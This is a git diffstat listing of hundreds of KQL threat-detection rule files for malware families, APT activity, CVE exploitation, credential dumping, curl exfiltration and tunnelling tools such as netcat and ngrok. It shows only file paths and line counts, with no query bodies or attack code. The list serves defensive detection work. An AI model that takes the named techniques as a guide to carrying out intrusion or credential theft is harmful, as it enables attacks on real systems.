.../hermetic_wiper_tg_process_patterns.kql | 10 + ...ackdoor_curl_tor_socks_proxy_execution.kql | 12 + ...apeka_backdoor_loaded_via_rundll32_exe.kql | 12 + 
.../Execution/katz_stealer_dll_loaded.kql | 15 ++ .../lace_tempest_cobalt_strike_download.kql | 12 + .../lace_tempest_file_indicators.kql | 12 + .../lace_tempest_malware_loader_execution.kql | 12 + .../Execution/lazarus_group_activity.kql | 12 + .../macos_filegrabber_infostealer.kql | 10 + .../Execution/mercury_apt_activity.kql | 10 + ...erafaspex_suspicious_process_execution.kql | 12 + ...storm_log4j_wstomcat_process_execution.kql | 10 + ...ageengine_suspicious_process_execution.kql | 12 + ...nyx_sleet_apt_file_creation_indicators.kql | 12 + ..._mf_ng_exploitation_related_indicators.kql | 12 + .../papercut_mf_ng_potential_exploitation.kql | 12 + ...dstorm_apt_process_activity_indicators.kql | 12 + .../potential_apt10_cloud_hopper_activity.kql | 12 + ...tential_apt_fin7_exploitation_activity.kql | 14 ++ ...nnaissance_powertrash_related_activity.kql | 12 + ...fin7_related_powershell_script_created.kql | 10 + ..._panda_activity_against_australian_gov.kql | 12 + .../potential_baby_shark_malware_activity.kql | 10 + ...otential_blackbyte_ransomware_activity.kql | 10 + ...al_cve_2021_26857_exploitation_attempt.kql | 10 + ...al_cve_2021_40444_exploitation_attempt.kql | 10 + ...space_one_access_remote_code_execution.kql | 14 ++ ...al_cve_2022_29072_exploitation_attempt.kql | 13 + ..._exploitation_fake_wermgr_exe_creation.kql | 10 + ...874_exploitation_fake_wermgr_execution.kql | 12 + ...loitation_uncommon_report_wer_location.kql | 10 + ...ect_os_command_injection_file_creation.kql | 14 ++ .../Execution/potential_emotet_activity.kql | 12 + ...tation_attempt_from_office_application.kql | 10 + ...2024_3094_suspicious_ssh_child_process.kql | 13 + ...uspicious_creation_of_esx_admins_group.kql | 13 + ...tial_goofy_guineapig_backdoor_activity.kql | 12 + ...kabot_activity_lure_document_execution.kql | 12 + .../potential_maze_ransomware_activity.kql | 12 + ...tation_dynamic_compilation_via_csc_exe.kql | 19 ++ .../Execution/potential_qbot_activity.kql | 12 + 
...ential_raspberry_robin_dot_ending_file.kql | 10 + ...ential_sap_netweaver_webshell_creation.kql | 14 ++ ..._sap_netweaver_webshell_creation_linux.kql | 14 ++ ..._malware_installation_binary_indicator.kql | 12 + ...e_installation_cli_arguments_indicator.kql | 12 + ..._malware_persistence_service_execution.kql | 10 + .../potential_snatch_ransomware_activity.kql | 12 + .../printernightmare_mimikatz_driver_name.kql | 12 + .../qakbot_uninstaller_execution.kql | 12 + ..._initial_execution_from_external_drive.kql | 12 + ...robin_subsequent_execution_of_commands.kql | 12 + ...revil_kaseya_incident_malware_patterns.kql | 10 + ...orschach_ransomware_execution_activity.kql | 12 + ...nake_malware_installer_name_indicators.kql | 12 + ...e_malware_kernel_driver_file_indicator.kql | 12 + ...are_werfault_persistence_file_creation.kql | 10 + .../Execution/trickbot_malware_activity.kql | 10 + .../tropictrooper_campaign_november_2018.kql | 10 + .../turla_group_lateral_movement.kql | 10 + .../Execution/unc2452_powershell_pattern.kql | 12 + .../unc2452_process_creation_patterns.kql | 10 + ..._barracuda_esg_exploitation_indicators.kql | 12 + ...nc4841_email_exfiltration_file_pattern.kql | 10 + .../unc4841_potential_seaspy_execution.kql | 12 + ...snif_redirection_of_discovery_commands.kql | 13 + .../Execution/zxshell_malware.kql | 12 + ...ackage_malicious_exfiltration_via_curl.kql | 12 + .../funklocker_ransomware_file_creation.kql | 12 + .../Impact/lockergoga_ransomware_activity.kql | 12 + .../potential_conti_ransomware_activity.kql | 12 + .../Impact/potential_dtrack_rat_activity.kql | 12 + ...hell_command_injection_processcreation.kql | 12 + .../atlassian_confluence_cve_2022_26134.kql | 10 + ..._authentication_bypass_cve_2025_57791_.kql | 12 + ...cve_2021_31979_cve_2021_33771_exploits.kql | 12 + ...979_cve_2021_33771_exploits_by_sourgum.kql | 12 + ...e_2024_50623_exploitation_attempt_cleo.kql | 13 + .../Initial Access/dns_rce_cve_2020_1350.kql | 12 + 
...oited_cve_2020_10189_zoho_manageengine.kql | 10 + ...ce_cve_2021_26084_exploitation_attempt.kql | 10 + ...28_exploitation_attempt_vmware_horizon.kql | 13 + ...al_cve_2022_26809_exploitation_attempt.kql | 12 + ...empt_of_undocumented_windowsserver_rce.kql | 10 + ...tation_of_goanywhere_mft_vulnerability.kql | 14 ++ ...ve_2025_53770_exploitation_file_create.kql | 12 + ...cve_2025_53770_exploitation_indicators.kql | 12 + .../suspicious_crushftp_child_process.kql | 16 ++ .../wannacry_ransomware_activity.kql | 10 + .../blackbyte_ransomware_registry.kql | 13 + .../Persistence/blue_mockingbird.kql | 10 + ...l_rat_anonymous_user_process_execution.kql | 10 + ...oldsteel_rat_cleanup_command_execution.kql | 12 + ...teel_rat_service_persistence_execution.kql | 12 + ...raversal_webshell_drop_cve_2025_57790_.kql | 12 + ..._suspicious_new_printer_ports_registry.kql | 14 ++ ...eenconnect_path_traversal_exploitation.kql | 13 + .../darkgate_user_created_via_net_exe.kql | 12 + ...oiting_setupcomplete_cmd_cve_2019_1378.kql | 10 + ...eka_backdoor_configuration_persistence.kql | 12 + .../moriya_rootkit_file_created.kql | 10 + .../oceanlotus_registry_activity.kql | 10 + .../outlook_task_note_reminder_received.kql | 12 + .../potential_bearlpe_exploitation.kql | 10 + ...steel_persistence_service_dll_creation.kql | 10 + ...coldsteel_persistence_service_dll_load.kql | 13 + ...otential_coldsteel_rat_file_indicators.kql | 10 + ...al_coldsteel_rat_windows_user_creation.kql | 10 + ...on_hta_file_creation_by_foxitpdfreader.kql | 10 + ...e_2023_36884_exploitation_dropped_file.kql | 10 + ...registry_blob_related_to_snake_malware.kql | 12 + ...tivity_shutdown_schedule_task_creation.kql | 12 + ...otential_netwire_rat_activity_registry.kql | 10 + ...al_notepad_cve_2025_49144_exploitation.kql | 13 + ...al_printnightmare_exploitation_attempt.kql | 10 + ...registry_set_internet_settings_zonemap.kql | 12 + ...ntial_ursnif_malware_activity_registry.kql | 10 + 
...reenconnect_user_database_modification.kql | 14 ++ ...xploitation_cve_2021_35211_by_dev_0322.kql | 12 + ...lud_malicious_github_workflow_creation.kql | 12 + ...all_sieve_malware_registry_persistence.kql | 12 + ...nake_malware_covert_store_registry_key.kql | 10 + .../Persistence/sourgum_actor_behaviours.kql | 10 + ...s_printerports_creation_cve_2020_1048_.kql | 12 + ..._spawned_by_centrestack_portal_apppool.kql | 13 + ...spooler_service_suspicious_binary_load.kql | 13 + .../apt27_emissary_panda_activity.kql | 12 + .../chromeloader_malware_execution.kql | 12 + ...user_and_guid_password_cve_2025_57788_.kql | 14 ++ .../defrag_deactivation.kql | 10 + .../exploiting_cve_2019_1388.kql | 10 + ...d_apt_custom_protocol_handler_creation.kql | 14 ++ ...stom_protocol_handler_dll_registry_set.kql | 14 ++ ...hafnium_exchange_exploitation_activity.kql | 12 + ...ss_spawning_rundll32_guloader_activity.kql | 14 ++ ...r_lpe_cve_2021_41379_file_create_event.kql | 12 + .../kapeka_backdoor_autorun_persistence.kql | 10 + .../kapeka_backdoor_persistence_activity.kql | 17 ++ .../leviathan_registry_key_activity.kql | 10 + ...vity_execution_of_more_com_and_vbc_exe.kql | 13 + ..._potential_cve_2025_32463_exploitation.kql | 16 ++ .../oilrig_apt_activity.kql | 12 + .../oilrig_apt_registry_persistence.kql | 12 + .../operation_wocao_activity.kql | 12 + .../pingback_backdoor_activity.kql | 12 + ...pingback_backdoor_dll_loading_activity.kql | 12 + .../pingback_backdoor_file_indicators.kql | 12 + ...otential_actinium_persistence_activity.kql | 12 + ...al_cve_2021_41379_exploitation_attempt.kql | 10 + ...ve_2023_21554_queuejumper_exploitation.kql | 10 + ...l_cve_2024_35250_exploitation_activity.kql | 14 ++ ...hftp_rce_vulnerability_cve_2025_54309_.kql | 12 + ...ot_activity_winlogon_shell_persistence.kql | 13 + .../potential_pikabot_hollowing_activity.kql | 14 ++ .../potential_plugx_activity.kql | 10 + .../potential_ryuk_ransomware_activity.kql | 12 + ...l_systemnightmare_exploitation_attempt.kql | 
10 + ...r_payload_execution_via_scheduled_task.kql | 15 ++ ...ll_sieve_malware_commandline_indicator.kql | 12 + .../suspicious_sysmon_as_execution_parent.kql | 10 + .../suspicious_vbscript_un2452_pattern.kql | 10 + .../taidoor_rat_dll_load.kql | 10 + .../turla_group_commands_may_2020.kql | 10 + .../winnti_malware_hk_university_campaign.kql | 12 + .../winnti_pipemon_characteristics.kql | 12 + .../conti_volume_shadow_listing.kql | 10 + .../foggyweb_backdoor_dll_loading.kql | 12 + .../formbook_process_creation.kql | 10 + .../mustang_panda_dropper.kql | 12 + ...ous_word_cab_file_write_cve_2021_40444.kql | 10 + .../clipboard_data_collection_via_pbpaste.kql | 17 ++ ...ed_compressed_file_extraction_via_7zip.kql | 12 + ...suspicious_compression_tool_parameters.kql | 10 + .../Collection/system_drawing_dll_load.kql | 12 + .../curl_exe_execution.kql | 13 + ...rl_exe_execution_with_custom_useragent.kql | 13 + .../file_download_via_curl_exe.kql | 14 ++ ...ion_initiated_from_users_public_folder.kql | 15 ++ ...suspicious_azure_front_door_connection.kql | 15 ++ ...ary_code_execution_and_remote_sessions.kql | 28 +++ ...e_code_tunnel_execution_file_indicator.kql | 13 + ...dential_files_by_uncommon_applications.kql | 18 ++ ...nsitive_files_by_uncommon_applications.kql | 17 ++ ...vol_policies_share_by_uncommon_process.kql | 10 + ..._loaded_by_uncommon_suspicious_process.kql | 16 ++ ...og_query_requests_by_builtin_utilities.kql | 13 + .../Credential Access/pfx_file_creation.kql | 26 ++ ...assword_reconnaissance_via_findstr_exe.kql | 10 + .../unattend_xml_file_access_attempt.kql | 12 + ...eg_hive_files_by_uncommon_applications.kql | 12 + ...ok_mail_files_by_uncommon_applications.kql | 18 ++ .../ads_zone_identifier_deleted.kql | 12 + .../amsi_dll_load_by_uncommon_process.kql | 12 + ...tsproxy_dll_loaded_by_uncommon_process.kql | 14 ++ .../codepage_modification_via_mode_com.kql | 12 + .../diskshadow_child_process_spawned.kql | 12 + .../diskshadow_script_mode_execution.kql | 13 + 
.../dll_call_by_ordinal_via_rundll32_exe.kql | 13 + ...ork_connection_to_non_local_ip_address.kql | 15 ++ .../dmp_hdmp_file_creation.kql | 12 + ...ic_net_compilation_via_csc_exe_hunting.kql | 12 + ...le_or_folder_permissions_modifications.kql | 13 + ...dless_process_launched_via_conhost_exe.kql | 12 + ..._exe_initiated_http_network_connection.kql | 13 + ..._the_cryptography_powershell_namespace.kql | 15 ++ ...rosoft_office_trusted_location_updated.kql | 12 + .../microsoft_workflow_compiler_execution.kql | 13 + ...initiated_network_connection_over_http.kql | 15 ++ ...cting_package_created_via_iexpress_exe.kql | 15 ++ ...e_added_via_new_netfirewallrule_cmdlet.kql | 13 + ...e_obfuscation_using_unicode_characters.kql | 12 + ...sideloading_activity_via_extexport_exe.kql | 13 + ...on_via_explorer_exe_from_shell_process.kql | 16 ++ ..._execution_from_guid_like_folder_names.kql | 14 ++ ..._the_cryptography_powershell_namespace.kql | 15 ++ ...isterserver_export_function_explicitly.kql | 14 ++ ...rvice_binary_in_user_controlled_folder.kql | 14 ++ ...files_as_system_files_using_attrib_exe.kql | 10 + .../terminate_linux_process_via_kill.kql | 10 + .../use_short_name_path_in_command_line.kql | 19 ++ ..._file_creation_in_codeintegrity_folder.kql | 13 + .../Discovery/cmd_shell_output_redirect.kql | 14 ++ .../Discovery/net_exe_execution.kql | 12 + .../Discovery/process_discovery.kql | 14 ++ .../Discovery/sc_exe_query_execution.kql | 13 + .../suspicious_tasklist_discovery_command.kql | 12 + ...tem_information_discovery_via_wmic_exe.kql | 15 ++ .../arbitrary_command_execution_using_wsl.kql | 14 ++ .../cab_file_extraction_via_wusa_exe.kql | 13 + ...ment_execution_dfsvc_exe_child_process.kql | 12 + ...d_executed_via_run_dialog_box_registry.kql | 14 ++ ...xe_network_connection_to_non_local_ips.kql | 12 + ..._new_module_via_powershell_commandline.kql | 12 + ..._of_script_inside_of_a_compressed_file.kql | 20 ++ .../microsoft_excel_add_in_loaded.kql | 12 + 
.../microsoft_word_add_in_loaded.kql | 13 + ...ection_initiated_by_powershell_process.kql | 17 ++ ...tware_execution_uc_berkeley_signature_.kql | 14 ++ ...l_file_override_append_via_set_command.kql | 16 ++ ..._suspicious_powershell_child_processes.kql | 14 ++ .../process_execution_from_webdav_share.kql | 16 ++ ...path_configuration_file_creation_linux.kql | 15 ++ ...path_configuration_file_creation_macos.kql | 15 ++ ...th_configuration_file_creation_windows.kql | 15 ++ ...access_tool_ammy_admin_agent_execution.kql | 12 + ...s_tool_cmd_exe_execution_via_anyviewer.kql | 13 + ...nnect_remote_command_execution_hunting.kql | 14 ++ .../scheduled_task_created_filecreation.kql | 12 + .../scheduled_task_created_registry.kql | 12 + ...m_potential_suspicious_parent_location.kql | 14 ++ ...s_new_instance_of_an_office_com_object.kql | 14 ++ .../unusually_long_powershell_commandline.kql | 10 + .../wmi_module_loaded_by_uncommon_process.kql | 10 + ...vbe_file_execution_via_cscript_wscript.kql | 12 + ...connection_open_attempt_via_winscp_cli.kql | 10 + ...tential_data_exfiltration_via_curl_exe.kql | 12 + .../Exfiltration/tunneling_tool_execution.kql | 12 + ...scp_execution_from_non_standard_folder.kql | 10 + .../process_terminated_via_taskkill.kql | 14 ++ .../webdav_temporary_local_file_creation.kql | 12 + .../smb_over_quic_via_net_exe.kql | 12 + .../execution_from_webserver_root_folder.kql | 14 ++ .../shell_context_menu_command_tampering.kql | 12 + ...ted_in_potentially_suspicious_location.kql | 15 ++ .../elevated_system_shell_spawned.kql | 11 + ...tion_of_an_executable_by_an_executable.kql | 14 ++ .../7zip_compressing_dump_files.kql | 13 + ...kerberos_coercion_via_dns_spn_spoofing.kql | 17 ++ .../audio_capture_via_powershell.kql | 12 + .../audio_capture_via_soundrecorder.kql | 12 + .../automated_collection_command_prompt.kql | 10 + .../clipboard_collection_with_xclip_tool.kql | 14 ++ ...lipboard_data_collection_via_osascript.kql | 12 + 
...h_password_for_exfiltration_with_7_zip.kql | 12 + ..._password_for_exfiltration_with_winzip.kql | 10 + .../compressed_file_creation_via_tar_exe.kql | 14 ++ ...compressed_file_extraction_via_tar_exe.kql | 14 ++ .../data_copied_to_clipboard_via_clip_exe.kql | 10 + .../esentutl_steals_browser_information.kql | 12 + ...iles_added_to_an_archive_using_rar_exe.kql | 12 + ...ous_output_via_compress_archive_cmdlet.kql | 12 + .../Collection/gui_input_capture_macos.kql | 12 + .../Collection/hacktool_adcspwn_execution.kql | 12 + .../hacktool_impacket_tools_execution.kql | 12 + ...ckup_for_system_registry_hives_enabled.kql | 14 ++ ...ential_smb_relay_attack_tool_execution.kql | 12 + ...tial_suspicious_activity_using_secedit.kql | 12 + ...owershell_get_clipboard_cmdlet_via_cli.kql | 10 + ...es_accessing_the_microphone_and_webcam.kql | 10 + ...ge_with_password_and_compression_level.kql | 13 + ...rmation_for_export_with_command_prompt.kql | 10 + .../screen_capture_activity_via_psr_exe.kql | 10 + KQL/rules/Collection/screen_capture_macos.kql | 12 + ...uspicious_camera_and_microphone_access.kql | 12 + ...lation_of_default_accounts_via_net_exe.kql | 12 + ...veeam_backup_database_suspicious_query.kql | 10 + ...tabase_credentials_dump_via_sqlcmd_exe.kql | 10 + ...ed_disableaidataanalysis_value_deleted.kql | 15 ++ ...indows_recall_feature_enabled_registry.kql | 15 ++ ...ows_recall_feature_enabled_via_reg_exe.kql | 16 ++ .../winrar_compressing_dump_files.kql | 13 + ...inrar_execution_in_non_standard_folder.kql | 12 + ...i_cache_file_creation_by_uncommon_tool.kql | 12 + .../anydesk_temporary_artefact.kql | 15 ++ ...le_download_via_gfxdownloadwrapper_exe.kql | 10 + .../cloudflared_portable_execution.kql | 13 + .../cloudflared_quick_tunnel_execution.kql | 15 ++ ...cloudflared_tunnel_connections_cleanup.kql | 12 + .../cloudflared_tunnel_execution.kql | 12 + ...localtonet_tunneling_service_initiated.kql | 15 ++ ...onet_tunneling_service_initiated_linux.kql | 15 ++ 
.../curl_usage_on_linux.kql | 13 + ...entially_suspicious_directory_via_wget.kql | 10 + ..._download_and_execution_via_ieexec_exe.kql | 10 + ...ad_from_browser_process_via_inline_url.kql | 10 + ...nload_from_ip_based_url_via_certoc_exe.kql | 10 + ...ile_download_using_notepad_gup_utility.kql | 12 + .../file_download_via_certoc_exe.kql | 10 + .../finger_exe_execution.kql | 15 ++ ...assist_temporary_installation_artefact.kql | 15 ++ .../gzip_archive_decode_via_powershell.kql | 12 + .../hacktool_htran_natbypass_execution.kql | 10 + .../hacktool_inveigh_execution_artefacts.kql | 12 + ...b_relay_secrets_dump_module_indicators.kql | 12 + .../hacktool_sharpchisel_execution.kql | 12 + ...hacktool_silenttrinity_stager_dll_load.kql | 12 + ...acktool_silenttrinity_stager_execution.kql | 12 + ...ck_legit_rdp_session_to_move_laterally.kql | 12 + ...interchange_format_file_via_ldifde_exe.kql | 13 + .../installation_of_teamviewer_desktop.kql | 10 + ...ection_initiated_by_script_interpreter.kql | 13 + ...vestandaloneupdater_exe_proxy_download.kql | 12 + ...stsc_exe_execution_with_local_rdp_file.kql | 12 + ...m_process_located_in_suspicious_folder.kql | 12 + ...ication_initiated_to_portmap_io_domain.kql | 12 + ...k_connection_initiated_by_imewdbld_exe.kql | 11 + ...tially_suspicious_or_uncommon_location.kql | 11 + ...urewebsites_net_by_non_browser_process.kql | 11 + ...to_potential_dead_drop_resolver_domain.kql | 15 ++ ...ection_initiated_by_script_interpreter.kql | 12 + .../port_forwarding_activity_via_ssh_exe.kql | 12 + .../potential_amazon_ssm_agent_hijacking.kql | 12 + ...ownload_cradles_usage_process_creation.kql | 12 + ...nload_via_powershell_invoke_webrequest.kql | 10 + ...oad_upload_activity_using_type_command.kql | 10 + ...emory_download_and_compile_of_payloads.kql | 10 + ...ntial_linux_amazon_ssm_agent_hijacking.kql | 12 + .../potential_rdp_tunneling_via_plink.kql | 10 + .../potential_rdp_tunneling_via_ssh.kql | 10 + ...tential_wizardupdate_malware_infection.kql | 10 + 
.../potential_xcsset_malware_infection.kql | 10 + ...cious_network_connection_to_notion_api.kql | 12 + .../potentially_suspicious_usage_of_qemu.kql | 12 + .../printbrm_zip_creation_of_extraction.kql | 10 + .../pua_3proxy_execution.kql | 12 + .../pua_chisel_tunneling_tool_execution.kql | 12 + .../pua_fast_reverse_proxy_frp_execution.kql | 12 + .../pua_iox_tunneling_tool_execution.kql | 12 + .../pua_netcat_suspicious_execution.kql | 12 + .../pua_ngrok_execution.kql | 15 ++ .../pua_nimgrab_execution.kql | 12 + .../pua_nps_tunneling_tool_execution.kql | 12 + .../quickassist_execution.kql | 13 + .../rdp_over_reverse_ssh_tunnel.kql | 10 + .../rdp_to_http_or_https_target_ports.kql | 10 + .../remote_access_tool_anydesk_execution.kql | 15 ++ ...ydesk_execution_from_suspicious_folder.kql | 15 ++ ...ss_tool_anydesk_piped_password_via_cli.kql | 13 + ...ccess_tool_anydesk_silent_installation.kql | 12 + ...emote_access_tool_gotoassist_execution.kql | 15 ++ .../remote_access_tool_logmein_execution.kql | 15 ++ ...gent_command_execution_via_meshcentral.kql | 14 ++ ...emote_access_tool_netsupport_execution.kql | 15 ++ ...ol_potential_meshagent_execution_macos.kql | 15 ++ ..._potential_meshagent_execution_windows.kql | 15 ++ ...tool_renamed_meshagent_execution_macos.kql | 13 + ...ol_renamed_meshagent_execution_windows.kql | 13 + ...te_access_tool_screenconnect_execution.kql | 15 ++ ...al_suspicious_remote_command_execution.kql | 13 + ...mote_access_tool_simple_help_execution.kql | 15 ++ ...potentially_attacker_controlled_server.kql | 15 ++ ...mote_access_tool_ultraviewer_execution.kql | 15 ++ ...download_via_desktopimgdownldr_utility.kql | 10 + .../renamed_cloudflared_exe_execution.kql | 10 + ...ed_visual_studio_code_tunnel_execution.kql | 10 + ...e_code_tunnel_execution_file_indicator.kql | 11 + .../Command and Control/replace_exe_usage.kql | 10 + ...onnect_temporary_installation_artefact.kql | 15 ++ .../suspicious_binary_writes_via_anydesk.kql | 13 + 
...suspicious_certreq_command_to_download.kql | 15 ++ ...d_process_of_manage_engine_servicedesk.kql | 12 + ...spicious_curl_change_user_agents_linux.kql | 13 + .../suspicious_curl_exe_download.kql | 10 + .../suspicious_desktopimgdownldr_command.kql | 12 + ...spicious_desktopimgdownldr_target_file.kql | 12 + ..._download_and_compress_into_a_cab_file.kql | 10 + ...suspicious_download_from_office_domain.kql | 12 + .../suspicious_dropbox_api_usage.kql | 12 + .../suspicious_extrac32_execution.kql | 10 + ...usage_on_gzip_archive_process_creation.kql | 12 + ...suspicious_invoke_webrequest_execution.kql | 10 + ...oke_webrequest_execution_with_directip.kql | 10 + ...stsc_exe_execution_with_local_rdp_file.kql | 12 + ..._network_communication_with_google_api.kql | 13 + ...etwork_communication_with_telegram_api.kql | 12 + .../suspicious_plink_port_forwarding.kql | 12 + .../suspicious_tscon_start_as_system.kql | 10 + .../suspicious_velociraptor_child_process.kql | 12 + .../teamviewer_remote_session.kql | 12 + .../tor_client_browser_execution.kql | 10 + ...k_connection_initiated_by_certutil_exe.kql | 12 + ...use_of_ultravnc_remote_access_software.kql | 12 + .../visual_studio_code_tunnel_execution.kql | 12 + ...tudio_code_tunnel_remote_file_creation.kql | 11 + ...tudio_code_tunnel_service_installation.kql | 12 + ...ual_studio_code_tunnel_shell_execution.kql | 12 + .../wget_creating_files_in_tmp_directory.kql | 12 + ...rency_wallets_by_uncommon_applications.kql | 17 ++ ..._sysvol_files_by_uncommon_applications.kql | 10 + ..._history_file_by_uncommon_applications.kql | 12 + ...i_master_keys_by_uncommon_applications.kql | 12 + .../browser_started_with_remote_debugging.kql | 10 + .../capture_credentials_with_rpcping_exe.kql | 12 + .../certificate_exported_via_powershell.kql | 12 + ...mp_files_from_remote_share_via_cmd_exe.kql | 10 + .../copy_passwd_or_shadow_from_tmp_path.kql | 10 + ...g_sensitive_files_with_credential_data.kql | 12 + .../cred_dump_tools_dropped_files.kql | 12 + 
...anager_access_by_uncommon_applications.kql | 14 ++ ...dentials_from_password_stores_keychain.kql | 12 + .../credentials_in_files.kql | 10 + .../credui_dll_loaded_by_uncommon_process.kql | 12 + ...ys_and_certificate_export_activity_ioc.kql | 13 + ...dumping_of_sensitive_hives_via_reg_exe.kql | 12 + .../dumping_process_via_sqldumper_exe.kql | 12 + ...umeration_for_3rd_party_creds_from_cli.kql | 10 + ...numeration_for_credentials_in_registry.kql | 13 + .../esentutl_gather_credentials.kql | 12 + ...entutl_volume_shadow_copy_service_keys.kql | 10 + ...ccess_of_signal_desktop_sensitive_data.kql | 16 ++ .../findstr_gpp_passwords.kql | 10 + .../hacktool_crackmapexec_file_indicators.kql | 10 + ...hacktool_crackmapexec_process_patterns.kql | 10 + ...ol_dumpert_process_dumper_default_file.kql | 12 + ...ktool_dumpert_process_dumper_execution.kql | 12 + .../hacktool_execution_pe_metadata.kql | 12 + ...ool_hashcat_password_cracker_execution.kql | 12 + ...ol_hydra_password_bruteforce_execution.kql | 12 + .../hacktool_impacket_file_indicators.kql | 10 + .../hacktool_inveigh_execution.kql | 12 + .../hacktool_krbrelay_execution.kql | 12 + .../hacktool_lazagne_execution.kql | 14 ++ .../hacktool_mimikatz_execution.kql | 12 + .../hacktool_mimikatz_kirbi_file_creation.kql | 12 + .../hacktool_nppspy_hacktool_usage.kql | 10 + ...a_crackmapexec_or_impacket_secretsdump.kql | 10 + ..._pypykatz_credentials_dumping_activity.kql | 10 + .../hacktool_quarks_pwdump_execution.kql | 12 + .../hacktool_quarkspwdump_dump_file.kql | 10 + .../hacktool_remotekrbrelay_execution.kql | 13 + .../hacktool_safetykatz_dump_indicator.kql | 12 + .../hacktool_safetykatz_execution.kql | 12 + .../hacktool_securityxploded_execution.kql | 12 + ..._typical_hivenightmare_sam_file_export.kql | 12 + .../hacktool_winpwn_execution.kql | 11 + ...resting_service_enumeration_via_sc_exe.kql | 12 + ...irectory_diagnostic_tool_ntdsutil_exe_.kql | 12 + ...ed_module_enumeration_via_tasklist_exe.kql | 13 + 
.../lsass_dump_keyword_in_commandline.kql | 13 + ...request_via_dumptype_registry_settings.kql | 12 + ...ess_dump_artefact_in_crashdumps_folder.kql | 12 + ...s_memory_dump_creation_via_taskmgr_exe.kql | 12 + .../lsass_process_memory_dump_files.kql | 10 + ...process_reconnaissance_via_findstr_exe.kql | 10 + ...soft_iis_connection_strings_decryption.kql | 10 + ...ft_iis_service_account_password_dumped.kql | 10 + ...e_file_access_by_uncommon_applications.kql | 11 + ...mount_execution_with_hidepid_parameter.kql | 10 + ...neric_credentials_added_via_cmdkey_exe.kql | 14 ++ .../Credential Access/ntds_dit_created.kql | 10 + ...it_creation_by_uncommon_parent_process.kql | 10 + .../ntds_dit_creation_by_uncommon_process.kql | 10 + .../ntds_exfiltration_filename_patterns.kql | 10 + ...uration_reconnaissance_via_findstr_exe.kql | 12 + .../potential_browser_data_stealing.kql | 13 + ..._attempt_using_new_networkprovider_cli.kql | 12 + ..._attempt_using_new_networkprovider_reg.kql | 12 + ...ential_dumping_via_lsass_process_clone.kql | 10 + ..._via_lsass_silentprocessexit_technique.kql | 12 + .../potential_credential_dumping_via_wer.kql | 12 + ..._sniffing_activity_using_network_tools.kql | 15 ++ ...istory_access_attempt_via_history_file.kql | 14 ++ ..._for_cached_credentials_via_cmdkey_exe.kql | 12 + .../potential_sam_database_dump.kql | 12 + ...tential_spn_enumeration_via_setspn_exe.kql | 12 + ...fender_av_bypass_via_dump64_exe_rename.kql | 12 + ...ommand_targeting_teams_sensitive_files.kql | 12 + ...con_activity_using_log_query_utilities.kql | 14 ++ ...ly_suspicious_jwt_token_search_via_cli.kql | 13 + ...ally_suspicious_odbc_driver_registered.kql | 12 + .../powershell_get_process_lsass.kql | 10 + .../Credential Access/powershell_sam_copy.kql | 13 + ...s_reconnaissance_via_commandline_tools.kql | 10 + ...rocess_memory_dump_via_rdrleakdiag_exe.kql | 12 + .../pua_dit_snapshot_viewer.kql | 12 + .../pua_mouse_lock_execution.kql | 12 + .../pua_webbrowserpassview_execution.kql | 12 + 
...stry_export_of_third_party_credentials.kql | 12 + .../renamed_browsercore_exe_execution.kql | 10 + .../sensitive_file_dump_via_wbadmin_exe.kql | 14 ++ ...e_recovery_from_backup_via_wbadmin_exe.kql | 12 + ...tion_using_operating_systems_utilities.kql | 12 + ...sqlite_chromium_profile_data_db_access.kql | 10 + .../sqlite_firefox_profile_data_db_access.kql | 10 + ...e_access_to_browser_credential_storage.kql | 17 ++ .../suspicious_history_file_operations.kql | 13 + .../suspicious_key_manager_access.kql | 12 + ...icious_process_patterns_ntds_dit_exfil.kql | 10 + .../suspicious_reg_add_open_command.kql | 10 + .../suspicious_serv_u_process_pattern.kql | 12 + ...uspicious_system_user_process_creation.kql | 14 ++ ...ious_sysvol_domain_group_policy_access.kql | 12 + ..._application_related_objectacess_event.kql | 10 + ...irectory_diagnostic_tool_ntdsutil_exe_.kql | 13 + ...shadowcopy_symlink_creation_via_mklink.kql | 12 + .../wce_wceaux_dll_access.kql | 10 + .../werfault_lsass_process_memory_dump.kql | 10 + .../windows_credential_editor_registry.kql | 10 + ...credential_manager_access_via_vaultcmd.kql | 10 + ...p_file_created_by_uncommon_application.kql | 11 + ...rivilege_by_arbitrary_parent_processes.kql | 10 + .../abusing_print_executable.kql | 10 + ...add_insecure_download_source_to_winget.kql | 14 ++ .../add_new_download_source_to_winget.kql | 12 + ...spicious_new_download_source_to_winget.kql | 10 + .../add_safeboot_keys_via_reg_utility.kql | 12 + ..._exe_execution_from_uncommon_directory.kql | 10 + ...tifier_deleted_by_uncommon_application.kql | 12 + .../agentexecutor_powershell_execution.kql | 12 + ...levated_msi_spawned_cmd_and_powershell.kql | 10 + ...ays_install_elevated_windows_installer.kql | 14 ++ .../amsi_dll_loaded_via_lolbin_process.kql | 10 + ...river_disallowed_on_dev_drive_registry.kql | 13 + ...r_csproj_code_execution_via_dotnet_exe.kql | 12 + ...bitrary_file_download_via_imewdbld_exe.kql | 10 + ...ary_file_download_via_msedge_proxy_exe.kql | 10 + 
...bitrary_file_download_via_msohtmed_exe.kql | 10 + .../arbitrary_file_download_via_mspub_exe.kql | 10 + ...file_download_via_presentationhost_exe.kql | 10 + ...bitrary_file_download_via_squirrel_exe.kql | 13 + ...work_service_potential_dll_sideloading.kql | 10 + .../aspnetcompiler_execution.kql | 10 + ...sembly_loading_via_cl_loadassembly_ps1.kql | 10 + .../audit_policy_tampering_via_auditpol.kql | 14 ++ ...tampering_via_nt_resource_kit_auditpol.kql | 14 ++ .../audit_rules_deleted_via_auditctl.kql | 15 ++ ...bs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql | 12 + ...d_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql | 12 + .../baaupdate_exe_suspicious_dll_load.kql | 13 + ...cial_processes_with_improper_arguments.kql | 15 ++ ...64_encoded_powershell_command_detected.kql | 12 + .../Defense Evasion/binary_padding_macos.kql | 12 + .../bitlockertogo_exe_execution.kql | 16 ++ .../browser_execution_in_headless_mode.kql | 10 + .../bypass_uac_via_fodhelper_exe.kql | 12 + .../c_il_code_compilation_via_ilasm_exe.kql | 10 + .../certificate_exported_via_certutil_exe.kql | 12 + ...channel_access_permission_via_registry.kql | 10 + .../chmod_suspicious_directory.kql | 12 + .../Defense Evasion/clear_linux_logs.kql | 12 + .../cmstp_execution_process_creation.kql | 12 + .../cmstp_execution_registry_event.kql | 12 + .../cobaltstrike_load_by_rundll32.kql | 10 + .../code_execution_via_pcwutl_dll.kql | 12 + ...ation_via_mode_com_to_russian_language.kql | 14 ++ 